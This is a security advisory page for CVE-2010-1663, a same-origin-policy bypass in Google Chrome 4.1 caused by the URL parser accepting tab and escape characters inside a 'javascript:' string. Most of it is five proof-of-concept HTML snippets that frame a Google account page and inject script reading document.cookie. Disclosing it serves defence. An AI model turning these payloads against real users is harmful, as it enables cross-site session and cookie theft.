Google Chrome 4.1.249.1059 cross origin bypass vulnerability in Google URL

2010-05-20 / 2010-05-21
Credit: Jordi Chancel
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL) # # CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1663 # # Author: Jordi Chancel # # Software Link: http://googlechromereleases.blogspot.com/2010/04/stable-update-bug-and-security-fixes.html # # Description: { # The Google URL Parsing Library (aka google-url or GURL) in Google Chrome # before 4.1.249.1064 allows remote attackers to bypass the Same Origin Policy # via CHARACTER TABULATION or others escape characters inside javascript: protocol string. } # # Some PoC : <iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe> <a href="#" value="test" onclick="window.open('javascr\u0009ipt:alert(document.cookie)','test')" >Inject JavaScript</a> ---- <iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe> <a href="#" value="test" onclick="window.open('javascr\x09ipt:alert(document.cookie)','test')" >Inject JavaScript</a> ---- <iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe> <a href="#" value="test" onclick="window.open('javascr\nipt:alert(document.cookie)','test')" >Inject JavaScript</a> ---- <iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe> <a href="#" value="test" onclick="window.open('javascr\ript:alert(document.cookie)','test')" >Inject JavaScript</a> ---- <iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe> <a href="#" value="test" onclick="window.open('javascr\tipt:alert(document.cookie)','test')" >Inject JavaScript</a> Greetz : Xylitol , Eddy Bordi , 599eme Man , Gnouf , CTZ .


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top